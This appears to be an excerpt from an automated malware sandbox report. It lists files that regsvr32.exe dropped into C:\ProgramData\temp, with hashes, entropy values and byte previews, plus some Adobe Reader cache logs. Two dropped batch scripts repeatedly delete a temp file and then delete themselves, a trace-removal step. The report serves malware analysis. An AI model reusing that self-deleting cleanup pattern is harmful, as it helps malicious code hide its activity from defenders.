              SSDEEP:768:K+43PSMUgz5hFx0ciY3+cWOKxODfM855etCqHCJKbD0ku4kg00vT/gWAiO:6f9Ug7rihfOKkDE85AH7gku4xfvDDq
              MD5:0621F0A226FC42B30391F5CF942CA495
              SHA1:3BA32AB15F7514DBB15C5BC6A58F32988328E62E
              SHA-256:762DA8C156E140357CC822C49DFCC8E1FD035A6F2800AE44876111D11EF83BBF
              SHA-512:58055F8828BCEC943FAA4D9FF8AD5D3C91EC5B32E6518A4D747E450CEBBDED2B5EE0B77B77BED3C1AB5D28EB6490CCC120075ABEE5E53AF576E1F2C5C3888922
              Malicious:false
              Preview: PK........|W.S........*.......8848.tmpUT.....&a..&a..&a..XV.7...n...C....nP@|.A|.KA..i.......%../..>..=g.{.......3y.c...s.u7s...T.U... .,P,.p7.H.$...X$....$..R......B..Rf:V..:&F.O....=.LBjB...K.m..z?.u'......EJN.@.....l....Z.,DX.........`...:.......................IP..@C..@......Bb.!..,....NIx....Tn.\.1...R.mx.._i..........i.....xx...........+(ji......ZXZY....{xzy?y...."$.e.+pl\|B.I.Y.9.y...E.U.5.u...>.wtvu.....OLNM......olnm..~;:>9=;.~qy./(H?.............._P.O..`..=....@x.C....+..Y.D.....}....g...}.~...X...g.u.O...Pa. .......t>..H.$.X..........c9.k.a.Ny.+..f.+.Z`vk.,..*....-.i...Ou-..Q.\L..2.~.....)+.';...C...O...g.Z2.d ....:.F.F..3.mj...KG...2f.....%...... '.6]x...^Wsc...3..g.T......@..f.4.D../&U..i..>.[(b.|S..."T.......z...?.....%..R......?......NB.N .u....T(#nT.|.#.......Ec...+h.{......f...m]Ow.f............D.6%..K.#...7(nH.72.....&.[.h.v.......0...uS#.<..^D.....^.Wk.8.^.8...z........bm'p*aM~...J.#..`G.9&..N.w.L.v..lU.P...`v....
              C:\ProgramData\temp\8F38.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\9E5F.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\A3CB.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\A751.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\A94C.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\AE9B.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\BBC4.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\C011.tmp.bat
              Process:C:\Windows\System32\regsvr32.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):126
              Entropy (8bit):4.414464434628197
              Encrypted:false
              SSDEEP:3:CFF/NI9mTXZkREv5nnjpGODZkREv5nnjpxeQVAEgI98VH:C/FI9mTGQnnjpqQnnjpx9VhgI9EH
              MD5:8410AB3473CB58B9F78901BA5256048D
              SHA1:EE80D8F9FDA2FA89E59EAC4DFDA0CBD4E6E1F161
              SHA-256:18EFD55E1D931FF905F09EC9A9E70C560C577EFC0F21ED345E518F2E99B35C10
              SHA-512:0842117E49D1FB3058654125E427519889D60A5E54262CD5F814A94D782AB28E44A1C356AE8E2494686746521A60A92B86DBB9A3236848750F9303B5E28662EE
              Malicious:false
              Preview: .. :repeat.. del "C:\ProgramData\temp\BBF9.tmp".. if exist "C:\ProgramData\temp\BBF9.tmp" goto repeat.. del "%~f0"
              C:\ProgramData\temp\C5CF.tmp.bat
              Process:C:\Windows\System32\regsvr32.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):124
              Entropy (8bit):4.600388939395919
              Encrypted:false
              SSDEEP:3:CFF/NI9mTXZkRE/Awd/BODZkRE/AdfKFQVAEgI98VH:C/FI9mTGoVLFVhgI9EH
              MD5:6DE26458039B1131B1937434C146B1F6
              SHA1:3E03D515E7B26DBAEE04D0A71C3AA4CE3D8BBE3D
              SHA-256:9E193B27F408B9EA2A791160B57162F181281BBDE6B2C7A1F4829AD3B153468E
              SHA-512:86854D68EB46AC17720493C65B9BBEC9BFF6BC759D3E5E2E25A1348621997AD5E471F15C929F3663AD7C68AEB601582DA88816D91076B31724C8CD355E414AEB
              Malicious:false
              Preview: .. :repeat.. del "C:\ProgramData\glK7UwV.pR9a".. if exist "C:\ProgramData\glK7UwV.pR9a" goto repeat.. del "%~f0"
              C:\ProgramData\temp\C6B4.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\C72C.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\D219.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\EF72.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\F3E.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\F999.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              File Type:ASCII text
              Category:modified
              Size (bytes):294
              Entropy (8bit):5.208367716278872
              Encrypted:false
              SSDEEP:6:m3zAq2PPn2nKuAl9OmbnIFUtpc0ZmwPc0kwOPn2nKuAl9OmbjLJ:6Avn2HAahFUtpl/P35m2HAaSJ
              MD5:9FEEB360344F59197368D3C36FEE253A
              SHA1:DB39F82E57D1D84017ED87E9F49D0DF562DA9EDF
              SHA-256:3388BDB71AE2B8E7CDA2531053153DCDDF9BDA4F918BFEDCDF6159AD76B41F7C
              SHA-512:5895B3B89F77502D555A96CF95C74FF798404211CAD3B589D13C5C8F81498F35F42CAEADD6059619A6156090E28C29F3650778D4EBDDFD8489991D93D6E1F069
              Malicious:false
              Preview: 2021/08/25-10:58:58.661 6196 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/08/25-10:58:58.666 6196 Recovering log #3.2021/08/25-10:58:58.666 6196 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
              Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):294
              Entropy (8bit):5.208367716278872
              Encrypted:false
              SSDEEP:6:m3zAq2PPn2nKuAl9OmbnIFUtpc0ZmwPc0kwOPn2nKuAl9OmbjLJ:6Avn2HAahFUtpl/P35m2HAaSJ
              MD5:9FEEB360344F59197368D3C36FEE253A
              SHA1:DB39F82E57D1D84017ED87E9F49D0DF562DA9EDF
